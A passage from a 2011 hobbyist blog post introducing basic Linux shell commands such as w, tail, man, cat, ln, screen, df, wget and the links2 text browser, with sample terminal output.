4m = Sets the "underline" attribute
5m = Sets the "blink" attribute.
7m = Sets the "reverse" attribute.
8m = Sets the "hidden" attribute.
This is where I'll end this quick example of ANSI/TV100 being used to add color to your bash scripts. This is only a sample of the possibilities these codes create, so don't think it ends here. You can learn more at this site.
Tuesday, May 10, 2011
Some useful shell commands/tools
Well I've been learning some useful things I've previously didn't know about so I though I'd take a moment and post some useful things you can do at the command line.
See who's logged in and what they're doing with the "w" command;
See who's logged in and what they're doing with the "w" command;
~ $ w
00:41:06 up 1 day, 1:13, 8 users, load average: 1.57, 1.14, 1.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
pathogen pts/0 :0.0 Sun23 2:27m 57.59s 3:26 /usr/bin/python
pathogen pts/1 :0.0 Mon00 23:08m 0.29s 0.29s /bin/bash
pathogen pts/2 :0.0 Mon00 23:59m 35.86s 0.27s /bin/bash
pathogen pts/3 :0.0 Mon01 22:41m 4.50s 4.25s polipo
pathogen pts/4 :0.0 Mon02 1:42 44.25s 3:26 /usr/bin/python
pathogen pts/5 :0.0 23:32 0.00s 0.27s 0.01s w
pathogen pts/6 :0.0 23:34 57:46 0.48s 0.48s bash
pathogen pts/7 :0.0 23:44 56:24 0.28s 0.28s /bin/bash
The next command is the "tail" command which we used with arpwatch in a previous post. This command can be used to read the last 10 lines (or more) of a file or piped data and displays it in the terminal. This is nice if you want to watch logfiles for example.
tail -f /var/log/syslog
Another good command line tool is "top", which displays processor and process statistics in real time.
Next is extremely handy command - man - which is short for manual and is used to display in-depth information about a given command or gives you the ability to search for manuals containing a keyword. For example, the command "man ascii" returns a rather detailed ascii chart - which we all know can be a lifesaver. You can search for manuals containing a keyword like so;
~ $ man -k irc
aircrack-ng (1) - a 802.11 WEP / WPA-PSK key cracker
airodump-ng (1) - a wireless packet capture tool for aircrack-ng
airtun-ng (1) - a virtual tunnel interface creator for aircrack-ng
queue (3) - implementations of lists, tail queues, and circular queues
dir_colors (5) - configuration file for dircolors(1)
dircolors (1) - color setup for ls
irssi (1) - a modular IRC client for UNIX
xchat (1) - IRC client for X similar to AmIRC
XCirculateEvent (3) - CirculateNotify event structure
XCirculateRequestEvent (3) - CirculateRequest event structure
XCirculateSubwindows (3) - change window stacking order
XCirculateSubwindowsDown (3) - change window stacking order
XCirculateSubwindowsUp (3) - change window stacking order
This one is more a tip - autocompleting a command or directory using "TAB". If there's only one option then it autocompletes when you hit tab, otherwise it shows the possibilities. For example hitting "TAB" when I have net typed in the shell will return this;
~ $ net
net netcat netkit-ftp net.samba3 netscsid netstat
And hitting tab with /var/ typed will show me the existing directories in /var/ but if I hit "TAB" with "/var/r" than it will autocomplete it with "/var/run" because there's only one option.
This next command is "cat", which concatenates a file and displays it in the terminal. For example if we wanted to read the text file "hakhub" we could just use "cat";
~ $ cat hakhub
Is effin awesome.
You can also string commands together using the ";" operator, like we have with the ip parser and nmap. For example we can make a make a new directory and then copy our "hakhub" textfile to it. We will "cat" it at the end to verify it's there.
mkdir learning; cp hakhub /root/learning/;cat /root/learning/hakhub
Another useful command is "ln", which creates a link to a given file. For example we will make a symbolic link in the learning directory we created to the "hakhub" textfile in our root directory. Assuming we are currently in the root directory we will issue this command;
ln -s hakhub /root/learning/stuff
There's now a file in out learning directory which links back to our hakhub textfile, so if we were to cat the "stuff" link it would display it's contents just as before. So this could be useful to create links to tools located in various directories.
The next useful shell command is "screen", which I use to easily switch between various shells in one window (using CRTL A);
“Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells).”
You can read more about screen and get an idea of what it is and how it can be used here - http://linux.die.net/man/1/screen
This next one is "df", which stands for diskfree. Very basic but still nice to know if you have multiple drives or usb's up the yingyang.
~ $ df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/sda1 237431480 51512296 173858308 23% /
none 501520 316 501204 1% /dev
none 508544 284 508260 1% /dev/shm
none 508544 112 508432 1% /var/run
none 508544 0 508544 0% /var/lock
none 508544 0 508544 0% /lib/init/rw
none 237431480 51512296 173858308 23% /var/lib/ureadahead/debugfs
/dev/sdd1 1965696 637664 1328032 33% /media/SD Card
/dev/sdc1 1930464 1291072 639392 67% /media/disk-1
Next is "wget", which is a utility for non-interactive download of files from the internet. It supports both http and https along with ftp and has the ability to utilize proxies. This can be used in a variety of ways, it can be used with conky via bash scripts for example. Backtrack 4 uses a wget bash script to check the external ip and display it in conky. Though the possibilities are endless, that's just one example.
Another great tool that's simple yet has a ton of possible uses when coupled with other tools, grep. This tool is based around regular expressions and is used to search files for text. For example, this command would look for
This next tool is links2 which is a console-based text web browser which is extremely lightweight as you could imagine. There's others like it such as lynx, but I prefer links2 myself. You can use it by typing links2 in your console, then pressing "g" and entering the url. You can use links2 with a proxy like so;
links2 -http-proxy 127.0.0.1:9050
or to run it with a graphical interface, you can add a "-g"
links2 -g -http-proxy 127.0.0.1:9050
To be continued......
Subscribe to:
Posts (Atom)